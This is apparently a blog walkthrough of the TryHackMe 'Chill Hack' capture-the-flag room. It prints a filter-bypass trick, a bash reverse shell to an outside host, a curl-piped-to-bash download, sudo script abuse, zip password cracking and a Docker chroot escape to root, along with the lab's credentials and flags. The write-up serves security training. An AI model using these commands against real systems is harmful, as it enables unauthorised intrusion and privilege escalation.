Tryhackme - Chill Hack

Tryhackme – Chill Hack

In this walk through, we will be going through the Chill Hack from Tryhackme. This room is rated as easy on the platform however it will definitely challenge your basics and might throw you into a rabbit hole. In a nutshell, this room will test your enumeration skills and how well you can bypass input blacklisting and validation. Along with that it will challenge you in some system exploration and privilege escalation stuff. So on that note, let’s get started.

Chill Hack

Machine Info:

TitleChill Hack
IP address10.10.253.182
DifficultyEasy
ObjectiveChill the Hack out of the Machine.

Phase 1 – Enumeration

  • First checking if machine is live or not by pinging it.
ping machine

  • Started with the regular nmap scan with “-sS” and “-sV” flag. Found three common ports and services open – 21 (FTP), 22 (SSH) and 80 (HTTP).
wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.253.182 

Nmap scan report for 10.10.253.182
Host is up (0.18s latency).
Not shown: 996 closed ports
PORT   STATE    SERVICE VERSION
21/tcp open     ftp     vsftpd 3.0.3
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.88 seconds

  • I started with FTP first, tried anonymous login on the server. Got success and found a note. Further downloaded it to the local machine, reveals potential username.

wh1terose@fsociety:~$ ftp 10.10.253.182 
Connected to 10.10.253.182.
220 (vsFTPd 3.0.3)
Name (10.10.253.182:wh1terose): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (90 bytes).
226 Transfer complete.
90 bytes received in 0.00 secs (45.8719 kB/s)
ftp> exit
221 Goodbye.

ftp anon login

cat note.txt

  • Next i moved to another port that is 80 (HTTP). Started off by firing gobuster on it to reveal some juicy end points. Got something similar to my expectation, a secret directory literally called “secret”.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.253.182/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.253.182/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/30 11:51:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/css                  (Status: 301) [Size: 312] [--> http://10.10.253.182/css/]
/fonts                (Status: 301) [Size: 314] [--> http://10.10.253.182/fonts/]
/images               (Status: 301) [Size: 315] [--> http://10.10.253.182/images/]
/index.html           (Status: 200) [Size: 35184]                                 
/js                   (Status: 301) [Size: 311] [--> http://10.10.253.182/js/]    
/secret               (Status: 301) [Size: 315] [--> http://10.10.253.182/secret/]
/server-status        (Status: 403) [Size: 278]                                   
                                                                                  
===============================================================
2023/04/30 11:53:03 Finished
===============================================================

gobuster scan

  • The secret directory contains a search field which allows us to execute command on the underlying server however the input was filtered and only some commands was whitelisted. I tried “ls” which got “blocked” then i tried “pwd” and it worked.

command execute

allowed commands

commands allowed

Phase 2 – Initial Access

  • Next i tried various commands that i can work with but to be honest, i was banging my head against the wall for a while on this. Moving on, i found out that i can bypass the restriction on “ls” by typing it a forward slash. Plus, the restricted commands output can be seen in the source code.

l\s -la
l\s -la
source code with disallowed commands

  • As per the list there is no limitation on any of the commands which can be used to download stuff off the web like wget or curl. So, i used the below given one liner reverse shell to execute with the help of curl command to get the initial entry into the machine.

#bash reverse shell

bash -i >& /dev/tcp/10.18.11.103/4444 0>&1


# Execute the shell using curl command

curl 10.18.11.103:8000/shell.sh | ba\sh

nc listener

Phase 3 – Further exploitation & exploration

  • Once i got my initial shell, i tried to list the sudo configurations of the machine for the users. Found that a script called helpline.sh can be executed by user apaar.
www-data@ubuntu:/var/www/html/secret$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
www-data@ubuntu:/var/www/html/secret$ 
  • Peeking into the script to get an understanding what it is doing. The variable $msg in the end except an input, which we will exploit later. But at first let’s stabilize our shell.

www-data@ubuntu:/var/www/html/secret$ cat /home/apaar/.helpline.sh
cat /home/apaar/.helpline.sh
#!/bin/bash

echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo

read -p "Enter the person whom you want to talk with: " person

read -p "Hello user! I am $person,  Please enter your message: " msg

$msg 2>/dev/null

echo "Thank you for your precious time!"
www-data@ubuntu:/var/www/html/secret$ 

sudo -l

  • Upgrading shell to full tty.

www-data@ubuntu:/var/www/html/secret$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<ret$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/secret$ ^Z
[1]+  Stopped                 nc -lvnp 4444
wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ stty raw -echo;fg
nc -lvnp 4444

www-data@ubuntu:/var/www/html/secret$ stty rows 29 columns 126
www-data@ubuntu:/var/www/html/secret$ export TERM=success
www-data@ubuntu:/var/www/html/secret$    
  • Now we will exploit that variable ($msg) to get a shell and finally get our user flag.
www-data@ubuntu:/var/www/html/secret$ sudo -u apaar /home/apaar/.helpline.sh

Welcome to helpdesk. Feel free to talk to anyone at any time!

Enter the person whom you want to talk with: ian
Hello user! I am ian,  Please enter your message: /bin/bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
apaar@ubuntu:/var/www/html/secret$ ls
images  index.php
apaar@ubuntu:/var/www/html/secret$ cat /home/apaar/local.txt
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
apaar@ubuntu:/var/www/html/secret$ 

sudo -u apaar /home/apaar/.helpline.sh

Phase 4 – Privilege Escalation

  • Earlier a port was missed to capture that was eventually open – 8000. In there i found an image which was downloaded and then used steghide to extract the hidden data. The hidden data reveals a zip file but it was password protected. So, i used john to crack the zip file password. Post getting the password of the zip file reveals a source code.

#Getting the image file from the server.

wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ wget http://10.10.251.210:8000/hacker-with-laptop_23-2147985341.jpg
--2023-04-30 13:43:02--  http://10.10.251.210:8000/hacker-with-laptop_23-2147985341.jpg
Connecting to 10.10.251.210:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 68841 (67K) [image/jpeg]
Saving to: ‘hacker-with-laptop_23-2147985341.jpg’

hacker-with-laptop_2 100%[====================>]  67.23K  41.6KB/s    in 1.6s    

2023-04-30 13:43:04 (41.6 KB/s) - ‘hacker-with-laptop_23-2147985341.jpg’ saved [68841/68841]


#Extracting data with steghide.


wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ steghide --extract -sf hacker-with-laptop_23-2147985341.jpg 
Enter passphrase: 
wrote extracted data to "backup.zip".


wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ unzip backup.zip 
Archive:  backup.zip
[backup.zip] source_code.php password: 
   skipping: source_code.php         incorrect password



#Using john to crack the password of the zip file.

wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ ~/Tools/john/run/zip2john backup.zip > crack.txt
ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3 ts=2297 cs=2297 type=8
wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ ~/Tools/john/run/john crack.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:00 DONE 1/3 (2023-04-30 13:46) 0g/s 1340Kp/s 1340Kc/s 1340KC/s Phpsource1900..Pcode1900
Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst
Enabling duplicate candidate password suppressor
pass1word        (backup.zip/source_code.php)     
1g 0:00:00:00 DONE 2/3 (2023-04-30 13:46) 7.142g/s 595814p/s 595814c/s 595814C/s 123456..abundance
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

wget image file

unzip backup.zip

cracking zip with john

  • Taking a dive into the source code, we can see that a password is encoded for the user – Anurodh. You know where it is going now.
<html>
<head>
	Admin Portal
</head>
        <title> Site Under Development ... </title>
        <body>
                <form method="POST">
                        Username: <input type="text" name="name" placeholder="username"><br><br>
			Email: <input type="email" name="email" placeholder="email"><br><br>
			Password: <input type="password" name="password" placeholder="password">
                        <input type="submit" name="submit" value="Submit"> 
		</form>
<?php
        if(isset($_POST['submit']))
	{
		$email = $_POST["email"];
		$password = $_POST["password"];
		if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
		{ 
			$random = rand(1000,9999);?><br><br><br>
			<form method="POST">
				Enter the OTP: <input type="number" name="otp">
				<input type="submit" name="submitOtp" value="Submit">
			</form>
		<?php	mail($email,"OTP for authentication",$random);
			if(isset($_POST["submitOtp"]))
				{
					$otp = $_POST["otp"];
					if($otp == $random)
					{
						echo "Welcome Anurodh!";
						header("Location: authenticated.php");
					}
					else
					{
						echo "Invalid OTP";
					}
				}
 		}
		else
		{
			echo "Invalid Username or Password";
		}
        }
?>
</html>

source code

  • Used Cyberchef to decode the encoded password. I found – !d0ntKn0wmYp@ssw0rd

cyberchef

  • With the new username and password found, we log into the SSH server to get ahead in our privilege escalation journey for this box.

ssh anurodh
  • To get root shell and flag, i exploited the docker instance with a one-liner from GTFObins.

GTFObins docker
anurodh@ubuntu:~$  docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
Unable to find image 'ubuntu:latest' locally
docker: Error response from daemon: Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers).
See 'docker run --help'.
anurodh@ubuntu:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
alpine              latest              a24bb4013296        2 years ago         5.57MB
hello-world         latest              bf756fb1ae65        3 years ago         13.3kB
anurodh@ubuntu:~$ docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host /bin/bash
groups: cannot find name for group ID 11
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@fd09d321605c:/# cd /root 
root@fd09d321605c:~# ls
proof.txt
root@fd09d321605c:~# cat proof.txt 


					{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}


Congratulations! You have successfully completed the challenge.


         ,-.-.     ,----.                                             _,.---._    .-._           ,----.  
,-..-.-./  \==\ ,-.--` , \   _.-.      _.-.             _,..---._   ,-.' , -  `. /==/ \  .-._ ,-.--` , \ 
|, \=/\=|- |==||==|-  _.-` .-,.'|    .-,.'|           /==/,   -  \ /==/_,  ,  - \|==|, \/ /, /==|-  _.-` 
|- |/ |/ , /==/|==|   `.-.|==|, |   |==|, |           |==|   _   _\==|   .=.     |==|-  \|  ||==|   `.-. 
 \, ,     _|==/==/_ ,    /|==|- |   |==|- |           |==|  .=.   |==|_ : ;=:  - |==| ,  | -/==/_ ,    / 
 | -  -  , |==|==|    .-' |==|, |   |==|, |           |==|,|   | -|==| , '='     |==| -   _ |==|    .-'  
  \  ,  - /==/|==|_  ,`-._|==|- `-._|==|- `-._        |==|  '='   /\==\ -    ,_ /|==|  /\ , |==|_  ,`-._ 
  |-  /\ /==/ /==/ ,     //==/ - , ,/==/ - , ,/       |==|-,   _`/  '.='. -   .' /==/, | |- /==/ ,     / 
  `--`  `--`  `--`-----`` `--`-----'`--`-----'        `-.`.____.'     `--`--''   `--`./  `--`--`-----``  


--------------------------------------------Designed By -------------------------------------------------------
					|  Anurodh Acharya |
					---------------------

	               		     Let me know if you liked it.

Twitter
	- @acharya_anurodh
Linkedin
	- www.linkedin.com/in/anurodh-acharya-b1937116a



root@fd09d321605c:~# 

docker priv esc

root flag

Pwned

Also Read: Tryhackme – Burpsuite: The Basics

Conclusion:

Conclusion

So that was “Chill Hack” for you. Trust me, it wasn’t chill for me. I mean, it was meant to be an easy box however at some point of time, it makes me just roam around the circles. Summing it up, we first started with our nmap scan. Found our regular FTP, SSH and HTTP opened. Started first with the FTP, used anonymous login to get the note.txt file which reveal some potential usernames. Further, on the web part, used gobuster to reveal a secret directory which holds a command field which can be used to execute commands on the underlying operating system. Abusing it with curl, we got our initial access. Moving on and checking the sudo configurations, reveals a script that can be executed by the user apaar. We stabilize the shell and exploited the script to get our shell as the user apaar. Further, we missed a port 8000 which was running an additional server that holds an image file. Downloading the file and getting its hidden content with steghide reveals a backup.zip file. Next, we used john to crack the password of the zip file. The zip contains source code that has hard coded password for user anurodh. Decoding the password and using it to gain additional access using SSH. Finally, exploited docker instance misconfiguration to get the root flag and my old forgotten nudes.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top